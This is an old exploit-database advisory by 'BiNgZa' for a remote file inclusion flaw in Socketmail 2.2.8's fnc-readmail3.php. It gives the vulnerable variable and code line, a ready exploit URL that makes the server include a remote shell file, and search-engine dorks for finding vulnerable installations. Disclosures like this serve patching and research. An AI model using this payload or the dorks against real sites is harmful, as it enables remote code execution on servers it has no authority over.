Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion

EDB-ID:

4554


Author:

BiNgZa

Type:

webapps


Platform:

PHP

Date:

2007-10-22


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:

----------------------------------------------
} else {
    include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}

----------------------------------------------

GrEeTs To sHaDoW sEcUrItY TeAm, str0ke

BiG sHoUt OuT tO udplink.net

FoUnD By BiNgZa

DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"

DORK2: "Powered by SocketMail"

shadowcrew@hotmail.co.uk

shadow.php0h.com

# milw0rm.com [2007-10-22]